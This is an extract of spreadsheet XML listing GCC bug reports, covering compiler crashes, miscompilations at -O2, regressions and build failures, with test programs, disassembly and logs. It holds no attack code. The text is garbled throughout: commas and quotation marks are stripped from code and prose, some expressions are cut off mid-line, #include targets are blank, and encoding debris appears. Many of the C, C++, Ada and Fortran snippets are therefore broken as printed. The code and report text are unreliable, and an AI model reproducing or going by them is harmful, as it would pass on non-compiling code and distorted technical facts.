operators.cc:14: candidates are: bool blah::operator ==(const blah::B &amp; const blah:
:B &amp;)
Reversing the order of the statements blah::B () and ai == ad makes the error go away as does removing entirely the instance of B or moving the declaration of B into the global namespace. In my original program #including iostream before the other headers prevents the error.
I don't know why the statement ordering would affect name lookup which is why I think this is a compiler bug.
Release:
2.95.3-5
Environment:
i686-pc-cygwin Windows 2000 SP1
How-To-Repeat:
Attachment fails to compile</t>
  </si>
  <si>
    <t>raoulgough</t>
  </si>
  <si>
    <t>GCC-10307</t>
  </si>
  <si>
    <t>constructor for static object of template omitted</t>
  </si>
  <si>
    <t>The Base class has a static member with a constructor.
The member only exists for the side effects (registration).
The constructor of the static object is not being called.
I can force the constructor to be invoked by having it
modify a data element I read (and ignore) elsewhere.
As per the submission guidelines I have attached the 
preprocessed files but it only includes stdio.h
The hackaround addes a public integer i to StaticReg
and sets it to 0 in the constructor of derived
$ diff -u Foo.ii Foo-hack.ii
--- Foo.ii      2003-04-03 16:41:22.000000000 -0500
+++ Foo-hack.ii 2003-04-03 16:41:55.000000000 -0500
@@ -11328 +11328 @@
 class StaticReg {
-
-
+    public:
+        int i
     public:
         StaticReg() {
@@ -11547 +11547 @@
     public:
     derived() {
-
+        sr.i = 0
         fputs(World stdout)
     }
Release:
unknown
Environment:
$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.2/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --host=i386-redhat-linux --with-system-zlib --enable-__cxa_atexit
Thread model: posix
gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7)
$ rpm -q gcc
gcc-3.2-7
$ rpm -q redhat-release
redhat-release-8.0-8
How-To-Repeat:
$ make Foo Foo-hack
c++ -O2 --save-temps -o Foo Foo.cc
c++ -O2 -DHACKAROUND=1 -o Foo-hack Foo.cc
$ ./Foo
World
$ ./Foo-hack
Hello World</t>
  </si>
  <si>
    <t>kilpatds</t>
  </si>
  <si>
    <t>GCC-11380</t>
  </si>
  <si>
    <t>[ia64] stack frame &gt; 2 GB and no optimization results in SEGV</t>
  </si>
  <si>
    <t>On ia64 gcc produces bad code for stack frames greater than 2 GB when no
optimization is used.  It works fine with -O1 and above.  This results in the
application core dumping from a SEGV.  For example:
$ cat test.c
int test() {
        char    buf[4000000000]
        bzero(buf sizeof(buf))
}
$ gcc -v
Reading specs from /usr/local/lib/gcc-lib/ia64-unknown-linux-gnu/3.3/specs
Configured with: ./configure
Thread model: posix
gcc version 3.3
$ gcc -c test.c
$ objdump -d test.o
test.o:     file format elf64-ia64-little
Disassembly of section .text:
0000000000000000 :
   0:   0c 08 19 08 80 05       [MFI]       alloc r33=ar.pfs640
   6:   00 00 00 02 00 40                   nop.f 0x0
   c:   04 60 00 84                         mov r34=r12
  10:   05 00 00 00 01 80       [MLX]       nop.m 0x0
  16:   11 ff ff ff 7f 20                   movl r17=0xffffffff1194d800
  1c:   02 80 c2 6e
  20:   00 60 30 22 00 20       [MII]       add r12=r12r17
  26:   30 02 04 00 42 00                   mov r35=r1
  2c:   04 00 c4 00                         mov r32=b0
  30:   05 00 00 00 01 80       [MLX]       nop.m 0x0
  36:   11 00 00 00 00 80                   movl r36=0x1194d810
                                            ^^^^^^^^^^^^^^^^^^^^^
                                            should be 0xffffffff1194d810 
  3c:   04 81 c2 66
  40:   04 20 91 44 00 60       [MLX]       add r36=r36r34
  46:   ee 00 00 00 00 a0                   movl r37=0xee6b2800
  4c:   04 70 41 61
  50:   1c 00 00 00 01 00       [MFB]       nop.m 0x0
  56:   00 00 00 02 00 00                   nop.f 0x0
  5c:   08 00 00 50                         br.call.sptk.many b0=50 
  60:   02 08 00 46 00 21       [MII]       mov r1=r35
  66:   80 00 38 00 42 00                   mov r8=r14
  6c:   10 02 aa 00                         mov.i ar.pfs=r33
  70:   00 00 00 00 01 00       [MII]       nop.m 0x0
  76:   00 00 05 80 03 80                   mov b0=r32
  7c:   01 10 01 84                         mov r12=r34
  80:   1d 00 00 00 01 00       [MFB]       nop.m 0x0
  86:   00 00 00 02 00 80                   nop.f 0x0
  8c:   08 00 84 00                         br.ret.sptk.many b0
Note the movl at offset 36 should be 0xffffffff1194d810 instead of 0x1194d810.
As mentioned before this only occurs with no optimization i.e. -O1 and above
work fine.  It also occurs with all previous versions tested - 3.2.x 2.96 etc.
Tested on Itanium &amp; Itanium2 boxes running Red Hat Advanced Server 2.1.</t>
  </si>
  <si>
    <t>edwardsg</t>
  </si>
  <si>
    <t>GCC-79046</t>
  </si>
  <si>
    <t>g++ -print-file-name=plugin uses full version number in path</t>
  </si>
  <si>
    <t>Created attachment 40493
gcc patch for version from OpenSUSE
g++ -print-file-name=plugin uses the full version number in the path when just the major version number is all that's required for compatibility. This means that plugins have to require the specific version of gcc and have to be rebuild after every update to gcc. For what it's worth gcc on Ubuntu and OpenSUSE have already made this change and I've attached the patch from OpenSUSE that I believe does the change.</t>
  </si>
  <si>
    <t>davejohansen</t>
  </si>
  <si>
    <t>GCC-23514</t>
  </si>
  <si>
    <t>fixed point error cause Ada exception block does NOT work</t>
  </si>
  <si>
    <t>the bug should be only in windows OS
my test evnironment is win2k and win xp.
they are not work well.
I have try those compiler:
Gnat 3.15 p / mingw 3.42 / mingw 4.1
--the test code is
With Ada.Text_Io
Procedure Trading Is
   Type Price Is Delta 0.01 Digits 18
   Type PriceArray Is Array (Positive Range ) Of price
   Procedure Avg (Data : In PriceArray) Is
      Avg Sum : Price'Base := 0.0
   Begin
      Ada.Text_Io.Put (average:   )
      For Index In Data'Range Loop
         Sum := Sum + Data (Index)
      End Loop
      Avg := Sum / Data'Length
      Ada.Text_Io.Put (Price'Image (Avg))
      Ada.Text_Io.New_Line
   Exception
      When Others =&gt;
         Ada.Text_Io.Put_Line (error here!)
   End
Begin
   For Index In Reverse 0 .. 9 Loop
      For Step In 1 .. 3 Loop
         Declare
            Mydata : Pricearray (1 .. Index) :=  (Others =&gt; 10.0)
         Begin
            Avg (Mydata)
         End
      End Loop
   End Loop
end Trading
----end the test code</t>
  </si>
  <si>
    <t>kuan_long</t>
  </si>
  <si>
    <t>GCC-13382</t>
  </si>
  <si>
    <t>[3.3/3.4 Regression] Type information for const pointer disappears during optimisation.</t>
  </si>
  <si>
    <t>Compiling the source code
static const struct
{
  int aMember
} *const aPointer = 0
int main()
{
  int anInt = (aPointer == 0) ? 0 : aPointer-&gt;aMember
  return 0
}
with the command line
gcc -o prog -O prog.c
generates the following error output:
testgcc.c: In function `main':
testgcc.c:15: error: request for member `aMember' in something not a structure
or union
This does not happen if the -O switch is omitted.
This behaviour does not occur with gcc 2.95.3 (the only other Solaris version I
have to hand).</t>
  </si>
  <si>
    <t>richard.hutchinson</t>
  </si>
  <si>
    <t>GCC-56919</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] Wrong result for SYSTEM_CLOCK on Cygwin</t>
  </si>
  <si>
    <t>The regression has been caused by Janne's patch Rev. http://gcc.gnu.org/r169449 - which was checked in 2011-01-31  (= GCC 4.6)
See Angelo Graziosi's bug report at http://gcc.gnu.org/ml/fortran/2013-04/msg00085.html
The problem is that Cygwin does not support CLOCK_MONOTONIC using it will return always return 0.
Note that Cygwin not only defines CLOCK_MONOTONIC but since Cygwin-1.7.6 also  _POSIX_MONOTONIC_CLOCK 200112L [1]. Thus _POSIX_MONOTONIC_CLOCK [2] can also not be used.
Currently libgfortran uses (cf.libgfortran/intrinsics/system_clock.c):
/* POSIX states that CLOCK_REALTIME must be present if clock_gettime
   is available others are optional.  */
#ifdef CLOCK_MONOTONIC
#define GF_CLOCK_MONOTONIC CLOCK_MONOTONIC
#else
#define GF_CLOCK_MONOTONIC CLOCK_REALTIME
#endif
#ifdef HAVE_CLOCK_GETTIME
  err = clock_gettime (GF_CLOCK_MONOTONIC 
#else
#if defined(HAVE_CLOCK_GETTIME_LIBRT) &amp;&amp; SUPPORTS_WEAK &amp;&amp; GTHREAD_USE_WEAK
  if (weak_gettime)
    err = clock_gettime (GF_CLOCK_MONOTONIC 
#endif
  err = gf_gettime (secs nanosecs)
#endif
And gf_gettime (time_1.h) uses: gettimeofday - or if not available: clock_gettime (CLOCK_REALTIME - or a simple time(NULL).
Nick suggests to simply call gf_gettime unconditionally. [3]
[1] Cf. http://cygwin.com/ml/cygwin-announce/2010-08/msg00019.html  http://sourceware.org/ml/newlib/2010/msg00454.html
[2] http://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap02.html
[3] http://gcc.gnu.org/ml/fortran/2013-04/msg00086.html</t>
  </si>
  <si>
    <t>GCC-46407</t>
  </si>
  <si>
    <t>rx-elf --enable-werror-all build failure</t>
  </si>
  <si>
    <t>Beyond PR44764 these is an excess SEMICOLON on REGISTER_NAMES and then:
../../gcc/gcc/config/rx/rx.c: In function â€˜rx_promote_function_modeâ€™:
../../gcc/gcc/config/rx/rx.c:849:12: error: unused parameter â€˜punsignedpâ€™ [-Werror=unused-parameter]
../../gcc/gcc/config/rx/rx.c: In function â€˜rx_expand_builtinâ€™:
../../gcc/gcc/config/rx/rx.c:2043:7: error: passing argument 2 of â€˜valid_psw_flagâ€™ discards â€˜constâ€™ qualifier from pointer target type [-Werror]
../../gcc/gcc/config/rx/rx.c:2003:1: note: expected â€˜char *â€™ but argument is of type â€˜const char *â€™
../../gcc/gcc/config/rx/rx.c:2047:7: error: passing argument 2 of â€˜valid_psw_flagâ€™ discards â€˜constâ€™ qualifier from pointer target type [-Werror]
../../gcc/gcc/config/rx/rx.c:2003:1: note: expected â€˜char *â€™ but argument is of type â€˜const char *â€™
../../gcc/gcc/config/rx/rx.c: At top level:
../../gcc/gcc/config/rx/rx.c:2872:8: error: initialization from incompatible pointer type [-Werror]
../../gcc/gcc/config/rx/rx.c:2872:8: error: (near initialization for â€˜targetm.memory_move_costâ€™) [-Werror]</t>
  </si>
  <si>
    <t>GCC-61078</t>
  </si>
  <si>
    <t>[5 Regression] ESA mode bootstrap failure since r209897</t>
  </si>
  <si>
    <t>Regression hunt indicates that r209897 might have caused a bootstrap failure on s390 ESA mode:
Bootstrap dies reproducable with a segfault in bash:
...
make install-leaf DESTDIR=../.././gcc \
  slibdir= libsubdir= MULTIOSDIR=.
make[4]: Entering directory `/build/patched/gcc-4.10.0-build/s390-ibm-linux-gnu/libgcc'
/bin/sh /build/patched/gcc/libgcc/../mkinstalldirs ../.././gcc
/usr/bin/install -c -m 644 libgcc_eh.a ../.././gcc/
chmod 644 ../.././gcc/libgcc_eh.a
ranlib ../.././gcc/libgcc_eh.a
/bin/sh /build/patched/gcc/libgcc/../mkinstalldirs ../.././gcc /usr/bin/install -c -m 644 ./libgcc_s.so.1 ../.././gcc/libgcc_s.so.1 rm -f ../.././gcc/libgcc_s.so ln -s libgcc_s.so.1 ../.././gcc/libgcc_s.so
/bin/sh /build/patched/gcc/libgcc/../mkinstalldirs ../.././gcc
make[4]: *** [install-leaf] Segmentation fault
make[4]: Leaving directory `/build/patched/gcc-4.10.0-build/s390-ibm-linux-gnu/libgcc'
make[3]: *** [all] Error 2
make[3]: Leaving directory `/build/patched/gcc-4.10.0-build/s390-ibm-linux-gnu/libgcc'
make[2]: *** [all-stage2-target-libgcc] Error 2
make[2]: Leaving directory `/build/patched/gcc-4.10.0-build'
make[1]: *** [stage2-bubble] Error 2
make[1]: Leaving directory `/build/patched/gcc-4.10.0-build'
make: *** [all] Error 2
[pid  1082] vfork(Process 1088 attached
[pid  1088] rt_sigprocmask(SIG_SETMASK [] NULL 8) = 0
[pid  1088] prlimit64(0 RLIMIT_STACK {rlim_cur=8192*1024 rlim_max=RLIM64_INFINITY} NULL) = 0
[pid  1088] execve(/bin/sh [/bin/sh -c subdirs='testsuite' \\\ntarget=`e...] [/* 172 vars */] 
[pid  1082]  )       = 1088
[pid  1082] rt_sigprocmask(SIG_SETMASK [] NULL 8) = 0
[pid  1082] wait4(-1  
[pid  1088]  )      = 0
....
[pid  1088] --- SIGSEGV {si_signo=SIGSEGV si_code=SEGV_MAPERR si_errno=1825521056 si_addr=0} ---
[pid  1088] +++ killed by SIGSEGV +++
[pid  1082]  [{WIFSIGNALED(s) &amp;&amp; WTERMSIG(s) == SIGSEGV}] 0 NULL) = 1088
[pid  1082] --- SIGCHLD {si_signo=SIGCHLD si_code=CLD_KILLED si_pid=1088 si_status=SIGSEGV si_utime
=0 si_stime=0} ---
[pid  1082] sigreturn() (mask [])       = 1088
I've verified that reverting the patch fixes the problem. I haven't figured out yet how the patch is related to the problem. Perhaps the execve arguments for /bin/sh somehow get messed up with the patch?!</t>
  </si>
  <si>
    <t>GCC-20345</t>
  </si>
  <si>
    <t>Warning on forward declaration of class with __dllexport__</t>
  </si>
  <si>
    <t>Forward-declaring a class with a __dllexport__ or __dllimport__
attribute elicits the warning
  type attributes are honored only at type definition
even when the same attribute is repeated on the class definition.
Until recently this usage was accepted with no diagnostic. An
option to inhibit this warning with '-Wall -Wextra' would be welcome
at least on the ms windows platform (on other platforms and for
other attributes this usage may be uncommon or nonexistent).
Unlike the other cases considered in this patch:
  http://gcc.gnu.org/ml/gcc-patches/2003-12/msg01004.html
here the meaning is clear the warning diagnoses only redundancy
which the 'native' compiler for ms windows documents as permissible:
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/vclang/html/_pluslang_using_dllimport_and_dllexport_in_c.2b2b.asp
| You can declare C++ classes with the dllimport or dllexport attribute.
Building a recent cvs snapshot of wxWidgets yields 33673 instances
of this warning with MinGW gcc-3.4.2 but only five other warnings.
One of that library's maintainers states that they added the
redundant declarations throughout because gcc-3.3 required them in
some cases.
How to reproduce:
C:/tmp[0]$cat export_fwd_decl.cpp
class __attribute__((__dllexport__)) E
class __attribute__((__dllimport__)) I
class __attribute__((__dllexport__)) E {}
class __attribute__((__dllimport__)) I {}
C:/tmp[0]$/MinGW/bin/g++ -v -save-temps -Wall -Wextra -c export_fwd_decl.cpp
Reading specs from /MinGW/bin/../lib/gcc/mingw32/3.4.2/specs
Configured with: ../gcc/configure --with-gcc --with-gnu-ld --with-gnu-as --host=
mingw32 --target=mingw32 --prefix=/mingw --enable-threads --disable-nls --enable
-languages=cc++f77adaobjcjava --disable-win32-registry --disable-shared --e
nable-sjlj-exceptions --enable-libgcj --disable-java-awt --without-x --enable-ja
va-gc=boehm --disable-libgcj-debug --enable-interpreter --enable-hash-synchroniz
ation --enable-libstdcxx-debug
Thread model: win32
gcc version 3.4.2 (mingw-special)
 /MinGW/bin/../libexec/gcc/mingw32/3.4.2/cc1plus.exe -E -quiet -v -iprefix \MinG
W\bin\../lib/gcc/mingw32/3.4.2/ export_fwd_decl.cpp -Wall -Wextra -o export_fwd_
decl.ii
ignoring nonexistent directory /MinGW/bin/../lib/gcc/mingw32/3.4.2/../../../../
mingw32/include
ignoring nonexistent directory /mingw/lib/gcc/mingw32/3.4.2/../../../../mingw32
/include
#include ... search starts here:
#include  search starts here:
 /MinGW/bin/../lib/gcc/mingw32/3.4.2/../../../../include/c++/3.4.2
 /MinGW/bin/../lib/gcc/mingw32/3.4.2/../../../../include/c++/3.4.2/mingw32
 /MinGW/bin/../lib/gcc/mingw32/3.4.2/../../../../include/c++/3.4.2/backward
 /MinGW/bin/../lib/gcc/mingw32/3.4.2/../../../../include
 /MinGW/bin/../lib/gcc/mingw32/3.4.2/include
 /mingw/lib/gcc/mingw32/3.4.2/../../../../include/c++/3.4.2
 /mingw/lib/gcc/mingw32/3.4.2/../../../../include/c++/3.4.2/mingw32
 /mingw/lib/gcc/mingw32/3.4.2/../../../../include/c++/3.4.2/backward
 /mingw/lib/gcc/mingw32/3.4.2/../../../../include
 /mingw/include
 /mingw/lib/gcc/mingw32/3.4.2/include
 /mingw/include
End of search list.
 /MinGW/bin/../libexec/gcc/mingw32/3.4.2/cc1plus.exe -fpreprocessed export_fwd_d
ecl.ii -quiet -dumpbase export_fwd_decl.cpp -auxbase export_fwd_decl -Wall -Wext
ra -version -o export_fwd_decl.s
GNU C++ version 3.4.2 (mingw-special) (mingw32)
        compiled by GNU C version 3.4.2 (mingw-special).
GGC heuristics: --param ggc-min-expand=99 --param ggc-min-heapsize=130943
export_fwd_decl.cpp:1: warning: type attributes are honored only at type definit
ion
export_fwd_decl.cpp:2: warning: type attributes are honored only at type definit
ion
 /MinGW/bin/../lib/gcc/mingw32/3.4.2/../../../../mingw32/bin/as.exe -o export_fw
d_decl.o export_fwd_decl.s
C:/tmp[0]$cat export_fwd_decl.i*
# 1 export_fwd_decl.cpp
# 1 
# 1 
# 1 export_fwd_decl.cpp
class __attribute__((__dllexport__)) E
class __attribute__((__dllimport__)) I
class __attribute__((__dllexport__)) E {}
class __attribute__((__dllimport__)) I {}</t>
  </si>
  <si>
    <t>chicares</t>
  </si>
  <si>
    <t>GCC-11080</t>
  </si>
  <si>
    <t>g++ fails to compile Daixtrose</t>
  </si>
  <si>
    <t>Hi!
Sorry for disregarding the bug-report-etiquette.
I failed to reduce all this to small examples and
the problems are much too numerous.
After several months of trying different versions of g++
and after fiddling around with ICEs and probable workarounds I decide
that the problems are to be reported in sum.
The whole static const builtin and enum section is somewhat broken
with g++ so I feel like it is time to report this here.
- Daixtrose compiles fine with Intel C++ 7.1 using 
option -ansi so it is unlikely You find too many errors in it.
- Daixtrose stresses compiler's template support to maximum 
  so it is well designed as testsuite for any C++ compiler
- Daixtrose is shipped with GNU-autotool-support so it is easy to
  set up to see g++ malperform 
- download cvs at
  cvs -d:pserver:anonymous@cvs.sourceforge.net:/cvsroot/daixtrose login 
  cvs -z3 -d:pserver:anonymous@cvs.sourceforge.net:/cvsroot/daixtrose \
 	co daixtrose
- visit http://daixtrose.sourceforge.net/
best regards
Markus</t>
  </si>
  <si>
    <t>numerical.simulation</t>
  </si>
  <si>
    <t>GCC-10562</t>
  </si>
  <si>
    <t>Code segment optimization incorrectly disappeared with -O2 option</t>
  </si>
  <si>
    <t>When I compile the following code with a header file and a C file like following:
test.h
#define cpu_online_map	1
static inline unsigned int generic_hweight32(unsigned int w)
{
	unsigned int res = (w 
	res = (res 
	res = (res 
	res = (res 
	return (res 
}
#define hweight32(x)	generic_hweight32(x)
static inline unsigned int num_online_cpus(void)
{
	return hweight32(cpu_online_map)
}
test.c
#include 
#include test.h
int main(int argc char* argv[])
{
	int i
	for(i = 0 i &lt; num_online_cpus() i++){
		printf(gcc compiled correctly!\n)
	}
	return 0
}
The code in the for loop should at least executed one time! Because it equals to:
  for(i = 0 i &lt; 1 i ++){
    ....
  }
but if it is compiled with -O2 option the code segment in for loop will not be executed. Using objdump to disassembly the output file it can be found the code segment disappeared. If only use -O option the result is correct.
In fact the code in header file comes from linux kernel 2.4.19. And the bug is found during compile a kernel mode driver. 
This also happens on arm-linux-gcc version 3.2.1 which is a cross compile tool chain for ARM platform.
Release:
gcc-3.2 20020903
Environment:
Red Hat Linux 8.0 3.2-7
How-To-Repeat:
Just compile the code in description with -O2 option and execute the output file.</t>
  </si>
  <si>
    <t>fleming.feng</t>
  </si>
  <si>
    <t>GCC-5236</t>
  </si>
  <si>
    <t>ICE in arg_assoc at cp/decl2.c:4781</t>
  </si>
  <si>
    <t>g++ crashes when compiling the source below.
Note that the input is erroneous (missing `()' after `name').
Release:
3.1 20011231 (experimental)
Environment:
System: Linux karma 2.4.9-13 #1 Tue Oct 30 20:11:04 EST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../egcs/configure --prefix=/usr/local/egcs --enable-threads=posix --enable-long-long
How-To-Repeat:
$ g++ -c crash.cc
crash.cc: In function `void do_instance_getattr(PyTypeObject*)':
crash.cc:15: internal error #980715
crash.cc:15: Internal compiler error in arg_assoc at cp/decl2.c:4754
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
-------------------------------------------------
#include 
extern C int printf (...)
struct PyTypeObject{}
class type_object_base : public PyTypeObject
{
public:
  virtual ~type_object_base(){}
}
static void do_instance_getattr(PyTypeObject* obj)
{
  printf (xxx %s\n typeid(*static_cast(obj)).name)
}
-------------------------------------------------</t>
  </si>
  <si>
    <t>GCC-80732</t>
  </si>
  <si>
    <t>target_clones does not work with dlsym</t>
  </si>
  <si>
    <t>Compiling the code below to a executable with `gcc -Wall -Wextra -O3 -fPIC -ldl -rdynamic`. On a haswell+ system the output is
```
1:
0 4.93038e-32 0
2:
4.93038e-32 4.93038e-32 4.93038e-32
```
Showing that with the manually created ifunc dlsym direct function call and accessing function address produces the same result (the fma version) whereas with `target_clones` only direct function call uses the fma versison.
This might be related to https://gcc.gnu.org/bugzilla/show_bug.cgi?id=78366 but I'm not entirely sure. From that bug report I can understand that this is just how `target_clones` is currently implemented but I do think this is not a documentation issue and should be fixed / improved instead since
1. in this case there is user observable inconsistency in the result generated when different code paths are used. The fast math object should be allowed to produce slightly inaccurate result but I do think it should produce consistent result every time the function is called.
2. probably more importantly this behavior makes the `target_clone` attribute useless for used in public interface if the shared library can ever by dynamically loaded.
```
#include 
#include 
__attribute__((target_clones(defaultfma)noinlineoptimize(fast-math)))
double f1(double a double b double c)
{
    return a * b + c
}
double k1(double a double b double c void **p)
{
    *p = f1
    return f1(a b c)
}
__attribute__((target(fma)optimize(fast-math)))
static double f2_fma(double a double b double c)
{
    return a * b + c
}
__attribute__((optimize(fast-math)))
static double f2_default(double a double b double c)
{
    return a * b + c
}
static void *f2_resolve(void)
{
    __builtin_cpu_init ()
    if (__builtin_cpu_supports(fma))
        return f2_fma
    else
        return f2_default
}
double f2(double a double b double c) __attribute__((ifunc(f2_resolve)))
double k2(double a double b double c void **p)
{
    *p = f2
    return f2(a b c)
}
int main()
{
    volatile double a = 1.0000000000000002
    volatile double b = -0.9999999999999998
    volatile double c = 1.0
    void *hdl = dlopen(NULL RTLD_NOW)
    printf(1:\n)
    double (*pf1)(double double double) = dlsym(hdl f1)
    double (*pk1)(double double double void**) = dlsym(hdl k1)
    double (*_pf1)(double double double)
    double v1_1 = pf1(a b c)
    double v1_2 = pk1(a b c (void**)
    double v1_3 = _pf1(a b c)
    printf(%g %g %g\n v1_1 v1_2 v1_3)
    printf(2:\n)
    double (*pf2)(double double double) = dlsym(hdl f2)
    double (*pk2)(double double double void**) = dlsym(hdl k2)
    double (*_pf2)(double double double)
    double v2_1 = pf2(a b c)
    double v2_2 = pk2(a b c (void**)
    double v2_3 = _pf2(a b c)
    printf(%g %g %g\n v2_1 v2_2 v2_3)
    return 0
}
```</t>
  </si>
  <si>
    <t>yyc1992</t>
  </si>
  <si>
    <t>GCC-57915</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE in set_address_disp at rtlanal.c:5537</t>
  </si>
  <si>
    <t>On latest Fedora with: gcc version 4.8.1 20130603 (Red Hat 4.8.1-1) (GCC)
I get:
  $ /usr/bin/gcc -m32 -Os bug.c
  bug.c: In function â€˜menuâ€™:
  bug.c:59:1: internal compiler error: in set_address_disp at rtlanal.c:5537
   }
   ^
  Please submit a full bug report
possibly related to  asm(... X (*str))  I use X mostly because I had problems using m when the pointer points to local variable on the stack.
The problem do not exists with previous compiler versions not a new code.
The simplified source code I finished to get after few hours is:
$ cat bug.c
extern inline const char *
_strnchr (const char *str char c unsigned size)
{
  asm (cld  repne scasb %%es:(%%edi)%%al
	: +c (size) +D (str): a (c) X (*str):cc)
  return str - 1
}
extern inline unsigned
strlen (const char *str)
{
  return _strnchr (str '\0' (~0)) - str
}
extern inline void
_strncpy (char *dst const char *src unsigned nb)
{
  unsigned len = strlen (src)
  if (len &gt; nb)
    len = nb
  __builtin_memcpy (dst src len)
  dst[len] = '\0'
}
extern inline char *
strcpy (char *dst const char *src)
{
  _strncpy (dst src (~0))
  return dst
}
typedef struct
{
  char go_msg[8]
  char scanpath[16]
} gujin_param_t
extern gujin_param_t copy_gujin_param
enum { kernel_bottom_menu setup_bottom_menu } type
unsigned short getkey(void)
unsigned timeout
unsigned menu (void)
{
    char local_scanpath[sizeof (copy_gujin_param.scanpath)]
    strcpy (local_scanpath copy_gujin_param.scanpath)
    for ()
      {
	unsigned short key = getkey()
	if ((type == kernel_bottom_menu) ? (key == (0x1312)) : key == (0x3900 | ' '))
	  {
	    strcpy (local_scanpath copy_gujin_param.scanpath)
	  }
      }
}
Regards Etienne.</t>
  </si>
  <si>
    <t>GCC-65973</t>
  </si>
  <si>
    <t>[5/6 Regression] segmentation fault when compiling C++14 code</t>
  </si>
  <si>
    <t>Created attachment 35439
gzipped output of -freport-bug
Current gcc 6 snapshot fails to compile C++14 code:
internal compiler error: Segmentation fault
g++ -freport-bug -DHAVE_CONFIG_H -I.  -Wall -Wfatal-errors -Wextra -Wno-type-limits -Wstrict-aliasing -Wvla -Wdisabled-optimization -Wdouble-promotion  -pipe --std=c++1y   -D EXTENDED_PARALLEL_LOGGING__DEPENDS_ON_TARGET__  -DUSE_TABLEBASES -DUSE_NALIMOV_TABLEBASES  -DENABLE_GHOST_HTTP_SERVER  -DUSE_BITBASES -DUSE_SINGLE_PAWN_BITBASES -DUSE_TWO_PAWNS_BITBASES -DUSE_RAMMED_PAWNS_BITBASES     -g3   -I gmock-bundle/include -I gmock-bundle/gtest/include -g  -MT debug-ghost.o -MD -MP -MF .deps/debug-ghost.Tpo -c -o debug-ghost.o `test -f 'ghost.cpp' || echo './'`ghost.cpp
In file included from evaluation.h:8:0
                 from ghost.cpp:15:
evaluation_value.h: In constructor â€˜constexpr GhostEvaluation::OptimizedForAdding::VALUE::VALUE(int int)â€™:
evaluation_value.h:243:5: internal compiler error: Segmentation fault
     }
     ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccyVvJtP.out file please attach this to your bugreport.</t>
  </si>
  <si>
    <t>philipp.classen</t>
  </si>
  <si>
    <t>GCC-82720</t>
  </si>
  <si>
    <t>[PDT] ICE in gfc_conv_component_ref at fortran/trans-expr.c:2400</t>
  </si>
  <si>
    <t>Another test case :
$ cat z1.f90
program p
   type t(a)
      integer len :: a
      character(len=a) :: c
   end type
   type(t(:)) allocatable :: x
   allocate (t(2) :: x)
   x = t(2'ab')
   print * x%a
   print * x%c
   print * x
end
$ gfortran-8-20171022 -c z1.f90
z1.f90:11:0:
    print * x%c
internal compiler error: in gfc_conv_component_ref at fortran/trans-expr.c:2400
0x7598f0 gfc_conv_component_ref
        ../../gcc/fortran/trans-expr.c:2400
0x765903 gfc_conv_variable
        ../../gcc/fortran/trans-expr.c:2700
0x768eda gfc_conv_expr_reference(gfc_se* gfc_expr*)
        ../../gcc/fortran/trans-expr.c:7909
0x7881c6 gfc_trans_transfer(gfc_code*)
        ../../gcc/fortran/trans-io.c:2556
0x72f1c7 trans_code
        ../../gcc/fortran/trans.c:2024
0x785ca7 build_dt
        ../../gcc/fortran/trans-io.c:2028
0x72f1e7 trans_code
        ../../gcc/fortran/trans.c:1996
0x755edc gfc_generate_function_code(gfc_namespace*)
        ../../gcc/fortran/trans-decl.c:6422
0x6e7f20 translate_all_program_units
        ../../gcc/fortran/parse.c:6088
0x6e7f20 gfc_parse_file()
        ../../gcc/fortran/parse.c:6291
0x72c62f gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:204</t>
  </si>
  <si>
    <t>GCC-54516</t>
  </si>
  <si>
    <t>[4.8 regression] ICE in reload_cse_simplify_operands at postreload.c:403 with -O1 -march=armv7-a -mthumb</t>
  </si>
  <si>
    <t>Created attachment 28143
Reduced test case
$ arm-linux-gnueabi-g++ -O1 -march=armv7-a -mthumb -S ice.cc
ice.cc: In function 'void bug1046999()':
ice.cc:12:1: error: insn does not satisfy its constraints:
(insn 121 120 52 2 (set (zero_extract:SI (reg/f:SI 13 sp)
            (const_int 16 [0x10])
            (const_int 16 [0x10]))
        (const_int 65535 [0xffff])) bug1046999.cc:3 348 {*arm_movtas_ze}
     (nil))
ice.cc:12:1: internal compiler error: in reload_cse_simplify_operands at postreload.c:403
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Introduced in svn rev 190472</t>
  </si>
  <si>
    <t>Bernhard.Rosenkranzer</t>
  </si>
  <si>
    <t>GCC-50441</t>
  </si>
  <si>
    <t>[C++0x]  is missing GNU extension types</t>
  </si>
  <si>
    <t>With -std=gnu++0x enabled std::is_integral::value std::is_integral::value and std::is_floating_point::value should all be true.  Unfortunately they aren't.  This is an extremely easy simple fix I'd assume but it's one that's needed I think.</t>
  </si>
  <si>
    <t>classixretrox</t>
  </si>
  <si>
    <t>GCC-31999</t>
  </si>
  <si>
    <t>Make -i check finds one and fails to find another boehm-gc problem</t>
  </si>
  <si>
    <t>While tackling this bug ( http://gcc.gnu.org/bugzilla/show_bug.cgi?id=31998 ) I found a problem with the boehm-gc. This is a seperate bug report only about boehm-gc (and not about the interrelated issues of the above report).
/gcc/xgcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
